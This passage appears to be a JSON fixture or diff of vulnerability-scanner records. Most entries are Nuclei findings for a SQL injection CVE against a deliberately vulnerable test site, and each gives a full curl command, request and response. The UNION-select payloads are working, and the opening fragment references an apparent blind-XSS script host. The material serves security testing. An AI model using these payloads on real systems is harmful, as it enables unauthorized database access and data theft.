src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n\n<!-- App libs -->\n\n<script src="/static/app/app.js"></script>\n<script src="/static/app/libs/sessvars.js"></script>\n<script src="/static/app/post.js"></script>\n<script src="/static/app/controllers/controllers.js"></script>\n<script src="/static/app/services/itemsService.js"></script>\n<script src="http://bxss.s3.amazonaws.com/ad.js"></script>\n\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 16, + 17, + 18 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 304, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/cves/2022/CVE-2022-32028.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/CVE-2022-32028", + "template_id": "CVE-2022-32028", + "matcher_name": "", + "name": "Car Rental Management System 1.0 - SQL Injection", + "severity": 3, + "description": "Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_user.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md', 'https://nvd.nist.gov/vuln/detail/CVE-2022-32028', 'https://github.com/ARPSyndicate/kenzer-templates']", + "cvss_metrics": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", + "cvss_score": 7.2, + "curl_command": "curl -X 'GET' -d '' -H 'Host: testphp.vulnweb.com' -H 'User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+", + "discovered_date": "2024-11-13T02:40:02.950Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1/A01/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+ HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18\r\nConnection: close\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:40:02 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> c8c605999f3d8352d7bb792cf3fdb25b</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 19, + 20, + 21, + 22, + 23, + 24, + 25 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 305, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/cves/2022/CVE-2022-32028.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/CVE-2022-32028", + "template_id": "CVE-2022-32028", + "matcher_name": "", + "name": "Car Rental Management System 1.0 - SQL Injection", + "severity": 3, + "description": "Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_user.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md', 'https://nvd.nist.gov/vuln/detail/CVE-2022-32028', 'https://github.com/ARPSyndicate/kenzer-templates']", + "cvss_metrics": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", + "cvss_score": 7.2, + "curl_command": "curl -X 'GET' -d '' -H 'Host: testphp.vulnweb.com' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/536.12.27 (KHTML, like Gecko) Version/9.1.2 Safari/536.12.27' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+", + "discovered_date": "2024-11-13T02:40:03.934Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1/3/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+ HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/536.12.27 (KHTML, like Gecko) Version/9.1.2 Safari/536.12.27\r\nConnection: close\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:40:03 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> c8c605999f3d8352d7bb792cf3fdb25b</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 19, + 20, + 21, + 22, + 23, + 24, + 25 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 306, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/cves/2022/CVE-2022-32028.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/CVE-2022-32028", + "template_id": "CVE-2022-32028", + "matcher_name": "", + "name": "Car Rental Management System 1.0 - SQL Injection", + "severity": 3, + "description": "Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_user.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md', 'https://nvd.nist.gov/vuln/detail/CVE-2022-32028', 'https://github.com/ARPSyndicate/kenzer-templates']", + "cvss_metrics": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", + "cvss_score": 7.2, + "curl_command": "curl -X 'GET' -d '' -H 'Host: testphp.vulnweb.com' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+", + "discovered_date": "2024-11-13T02:40:04.100Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2/A01/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+ HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0\r\nConnection: close\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:40:03 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> c8c605999f3d8352d7bb792cf3fdb25b</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 19, + 20, + 21, + 22, + 23, + 24, + 25 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 307, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/cves/2022/CVE-2022-32028.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/CVE-2022-32028", + "template_id": "CVE-2022-32028", + "matcher_name": "", + "name": "Car Rental Management System 1.0 - SQL Injection", + "severity": 3, + "description": "Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_user.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md', 'https://nvd.nist.gov/vuln/detail/CVE-2022-32028', 'https://github.com/ARPSyndicate/kenzer-templates']", + "cvss_metrics": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", + "cvss_score": 7.2, + "curl_command": "curl -X 'GET' -d '' -H 'Host: testphp.vulnweb.com' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+", + "discovered_date": "2024-11-13T02:40:04.942Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+ HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36\r\nConnection: close\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:40:04 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> c8c605999f3d8352d7bb792cf3fdb25b</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 19, + 20, + 21, + 22, + 23, + 24, + 25 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 308, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/cves/2022/CVE-2022-32028.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/CVE-2022-32028", + "template_id": "CVE-2022-32028", + "matcher_name": "", + "name": "Car Rental Management System 1.0 - SQL Injection", + "severity": 3, + "description": "Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_user.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md', 'https://nvd.nist.gov/vuln/detail/CVE-2022-32028', 'https://github.com/ARPSyndicate/kenzer-templates']", + "cvss_metrics": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", + "cvss_score": 7.2, + "curl_command": "curl -X 'GET' -d '' -H 'Host: testphp.vulnweb.com' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:120.0) Gecko/20100101 Firefox/120.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+", + "discovered_date": "2024-11-13T02:40:05.106Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2/3/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+ HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:120.0) Gecko/20100101 Firefox/120.0\r\nConnection: close\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:40:04 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> c8c605999f3d8352d7bb792cf3fdb25b</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 19, + 20, + 21, + 22, + 23, + 24, + 25 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 309, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/cves/2022/CVE-2022-32028.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/CVE-2022-32028", + "template_id": "CVE-2022-32028", + "matcher_name": "", + "name": "Car Rental Management System 1.0 - SQL Injection", + "severity": 3, + "description": "Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_user.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md', 'https://nvd.nist.gov/vuln/detail/CVE-2022-32028', 'https://github.com/ARPSyndicate/kenzer-templates']", + "cvss_metrics": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", + "cvss_score": 7.2, + "curl_command": "curl -X 'GET' -d '' -H 'Host: testphp.vulnweb.com' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:78.0) Gecko/20100101 Firefox/78.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+", + "discovered_date": "2024-11-13T02:40:05.260Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3/3/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+ HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:78.0) Gecko/20100101 Firefox/78.0\r\nConnection: close\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:40:04 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> c8c605999f3d8352d7bb792cf3fdb25b</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 19, + 20, + 21, + 22, + 23, + 24, + 25 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 310, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/cves/2022/CVE-2022-32028.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/CVE-2022-32028", + "template_id": "CVE-2022-32028", + "matcher_name": "", + "name": "Car Rental Management System 1.0 - SQL Injection", + "severity": 3, + "description": "Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_user.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md', 'https://nvd.nist.gov/vuln/detail/CVE-2022-32028', 'https://github.com/ARPSyndicate/kenzer-templates']", + "cvss_metrics": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", + "cvss_score": 7.2, + "curl_command": "curl -X 'GET' -d '' -H 'Host: testphp.vulnweb.com' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.7.20' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+", + "discovered_date": "2024-11-13T02:40:05.410Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2/3L/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+ HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.7.20\r\nConnection: close\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:40:04 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> c8c605999f3d8352d7bb792cf3fdb25b</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 19, + 20, + 21, + 22, + 23, + 24, + 25 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 311, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/cves/2022/CVE-2022-32028.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/CVE-2022-32028", + "template_id": "CVE-2022-32028", + "matcher_name": "", + "name": "Car Rental Management System 1.0 - SQL Injection", + "severity": 3, + "description": "Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_user.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md', 'https://nvd.nist.gov/vuln/detail/CVE-2022-32028', 'https://github.com/ARPSyndicate/kenzer-templates']", + "cvss_metrics": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", + "cvss_score": 7.2, + "curl_command": "curl -X 'GET' -d '' -H 'Host: testphp.vulnweb.com' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+", + "discovered_date": "2024-11-13T02:40:05.930Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3/3L/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+ HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36\r\nConnection: close\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:40:05 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> c8c605999f3d8352d7bb792cf3fdb25b</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 19, + 20, + 21, + 22, + 23, + 24, + 25 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 312, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/cves/2022/CVE-2022-32028.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/CVE-2022-32028", + "template_id": "CVE-2022-32028", + "matcher_name": "", + "name": "Car Rental Management System 1.0 - SQL Injection", + "severity": 3, + "description": "Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_user.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md', 'https://nvd.nist.gov/vuln/detail/CVE-2022-32028', 'https://github.com/ARPSyndicate/kenzer-templates']", + "cvss_metrics": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", + "cvss_score": 7.2, + "curl_command": "curl -X 'GET' -d '' -H 'Host: testphp.vulnweb.com' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0 Safari/600.1.25' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+", + "discovered_date": "2024-11-13T02:40:06.093Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/Details/color-printer/3/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+ HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0 Safari/600.1.25\r\nConnection: close\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:40:05 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div><img src='/Mod_Rewrite_Shop/images/1.jpg'><b>c8c605999f3d8352d7bb792cf3fdb25b</b><br><br>4<br><a href='/Mod_Rewrite_Shop/BuyProduct-1/'>Buy</a>&nbsp;<a href='/Mod_Rewrite_Shop/RateProduct-1.html'>Rate</a></div><hr><a href='/Mod_Rewrite_Shop/'>Back</a>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 19, + 20, + 21, + 22, + 23, + 24, + 25 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 313, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/cves/2022/CVE-2022-32028.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/CVE-2022-32028", + "template_id": "CVE-2022-32028", + "matcher_name": "", + "name": "Car Rental Management System 1.0 - SQL Injection", + "severity": 3, + "description": "Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_user.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md', 'https://nvd.nist.gov/vuln/detail/CVE-2022-32028', 'https://github.com/ARPSyndicate/kenzer-templates']", + "cvss_metrics": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", + "cvss_score": 7.2, + "curl_command": "curl -X 'GET' -d '' -H 'Host: testphp.vulnweb.com' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+", + "discovered_date": "2024-11-13T02:40:06.246Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3/A01/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+ HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0\r\nConnection: close\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:40:05 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> c8c605999f3d8352d7bb792cf3fdb25b</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 19, + 20, + 21, + 22, + 23, + 24, + 25 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 314, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/cves/2022/CVE-2022-32028.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/CVE-2022-32028", + "template_id": "CVE-2022-32028", + "matcher_name": "", + "name": "Car Rental Management System 1.0 - SQL Injection", + "severity": 3, + "description": "Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_user.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md', 'https://nvd.nist.gov/vuln/detail/CVE-2022-32028', 'https://github.com/ARPSyndicate/kenzer-templates']", + "cvss_metrics": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", + "cvss_score": 7.2, + "curl_command": "curl -X 'GET' -d '' -H 'Host: testphp.vulnweb.com' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:50.0) Gecko/20100101 Firefox/50.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+", + "discovered_date": "2024-11-13T02:40:06.393Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET 